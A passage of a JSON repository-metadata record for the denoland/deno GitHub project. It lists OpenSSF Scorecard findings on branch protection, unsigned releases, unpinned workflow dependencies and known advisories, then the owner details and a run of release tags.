tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685524,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codel